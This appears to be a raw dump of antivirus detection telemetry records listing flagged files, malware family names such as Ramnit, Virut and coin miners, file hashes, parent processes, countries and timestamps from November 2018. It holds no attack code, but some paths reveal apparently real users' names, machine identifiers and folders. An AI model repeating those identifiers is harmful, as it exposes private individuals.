  Row(detection=Row(filename='qtposition_geoclue.dll', filepath='C:\\Program Files\\Zaxar\\position\\qtposition_geoclue.dll', filesize=192000, name='W32/Ramnit.C.#M1.#R1'), hash='efb62f8fae89c7b56d4dba8a6c16bffd635ecdeb012d171870302e4a4c62f2ef', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T18:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dlg_three.exe', filepath='\\\\?\\E:\\documents\\Projects\\Programy-Rozne\\source\\dlg_three\\Debug\\dlg_three.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='dc2f55422d9f5bbaf847714eccad02869ce919176631b87ddf3edcc1ac2e5a48', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184018-b50336a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40198741\\AVSCAN-20181102-183844-A86FE0D9\\AVSCAN-20181102-184018-B50336A5', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124658-797c6b43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d518bbe1\\AVSCAN-20181102-124602-739898C6\\AVSCAN-20181102-124658-797C6B43', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='imgburnpreview.exe', filepath='J:\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo.PenSuite.v2016.Full.MULTI-FREE\\Lupo_PenSuite_v2016_Full\\Apps\\ImgBurn\\ImgBurnPreview.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='e0800956cf969a77ca067d69d8324281af4b5f1ae403c822e80cb0381f59993e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nj.exe', filepath='c:\\users\\X\\appdata\\roaming\\nj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T13:16:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.12.2\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='a07e68babafa39418d8738a4030b3a7b0548c5d145c128299f41be269dd40d3c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:35:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered redol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered redol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a3cd24b89528caefdeb3fb22f11c6fc4c47deeb2c9cf2812b59294bd122c625c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094859-83175bc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-094859-83175BC8', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='ea576e6f7eaff287a3276b21ec50f510a52e5cc45e9c066ddd0f870f6b5bcd68', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102037-a3ffb1de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102037-A3FFB1DE', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zipdll.dll', filepath='D:\\DROPSCRIPTV1.9\\EDITOR GAMBAR ( RENAME, WATERMARK, DLL )\\FSViewer64\\ZipDll.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='fd43055f378b3429f3ce0903e2e20d23b0cfb3d7bf4c2bd0bb19e337070c8ba3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=6912000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='904cec899dee0721682fa133d210b8f230ec7877def1aa93bd1ac4414d645351', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2328872, timestamp='2018-11-02T15:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111136-3798d438', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6475cc\\AVSCAN-20181102-102215-7882B57A\\AVSCAN-20181102-111136-3798D438', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131731-2f5605e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131731-2F5605E9', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='be6c41a78f12e8e3d34f916924fc69a20bdc7fe4170c2b2d657afe41532b9562', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-02T04:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mcpp.exe', filepath='C:\\Users\\X\\Documents\\Mikroelektronika\\mikroC PRO for PIC\\mcpp.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='8d8412ab141210f8c2377aeeef3a44572f4f2fc0c797d06bade6b99c90974d18', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T08:34:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T00:06:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-02T01:07:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='мананков.exe', filepath='F:\\ТиМЦВС_PDF\\Мананков.exe', filesize=1920000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='fa7ee678263292b448bde6117bb33d950f7b82ada5700293ff1d1cd2c55a7596', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Distrib\\Total Commander\\Totalcmd.exe', parentsize=826916, timestamp='2018-11-04T12:44:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:14:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zbeub finder.exe', filepath='c:\\users\\X\\desktop\\zbeub finder.exe', filesize=2048000, name='HEUR/APC.#M1.#R1'), hash='b500de581700356962520b312158252db75db6d474ca8fd27f413334d366ed1a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:42:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{6A408304-E527-461F-BC50-723B367FDABD} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T19:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T13:32:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ec6e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec6e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hdh.exe', filepath='C:\\Windows\\hdh.exe', filesize=192000, name='HEUR/AGEN.1021412.#M1.#R1'), hash='b144c88a07b644e8498b699f5ca074d632b300be7e31dad068f2b5ea31186365', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl129.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl129.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202247-821b3c3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_690ab3e1\\AVSCAN-20181104-201541-5A869D8C\\AVSCAN-20181104-202247-821B3C3F', filesize=64000, name='TR/Spy.64000.63.#M1.#R1'), hash='ffc50b193a6366a5f551fa5365535af36ea20167a5dd6da842da49cf6b0a76e4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:22:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\Malwarebytes Antimalware\\MalwareBytes Anti-Malware Keygen v1.7 URET\\MalwareBytes Anti-Malware Keygen v1.7 URET.exe', parentsize=575104, timestamp='2018-11-04T15:37:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsp8A0C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T21:38:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:01:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nslD20C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T13:39:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d0ae3491366ee593fa7ffcec7f3a797e697cc74b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d0ae3491366ee593fa7ffcec7f3a797e697cc74b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='f89611716c01907a86c0d5dcbd79671793d15e2562d0d27dd6e3c765d32fe6de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:55:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skimmed.exe', filepath='C:\\Program Files (x86)\\Skimmed\\Skimmed.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:sFTRkviRGkWQmP0l.1', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F515E2F31BF3FEF5121BEB134C8FABDAA917EC78CAF029E4FCB9FAEC68EE1D2F', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:40:32Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9942144\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000093c', filepath='C:\\Windows\\Temp\\tmp00004416\\tmp0000093c', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='585c124e3a0eac4307584dc5f86533b09f8f7bed803c07c21925611d0c27a92b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BDServices\\BitDefenderCOM.exe', parentsize=773632, timestamp='2018-11-02T03:44:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F9F0BB9D762AA110FC70628DCE882CD288B4E5856B8064DD73687952AF0B067', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235347-62934b81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-235257-5CC05747\\AVSCAN-20181102-235347-62934B81', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='geer.dll', filepath='\\\\?\\C:\\Jeab work\\Game\\Granado Espada\\release\\Geer.dll', filesize=64000, name='HEUR/AGEN.1022186.#M1.#R1'), hash='6354a120ef6bfe745390f4d57c0fac7ff691fa8c04373f82c6950e7a581c0e7d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:12Z'), dt=datetime.date(2018, 11, 2)),
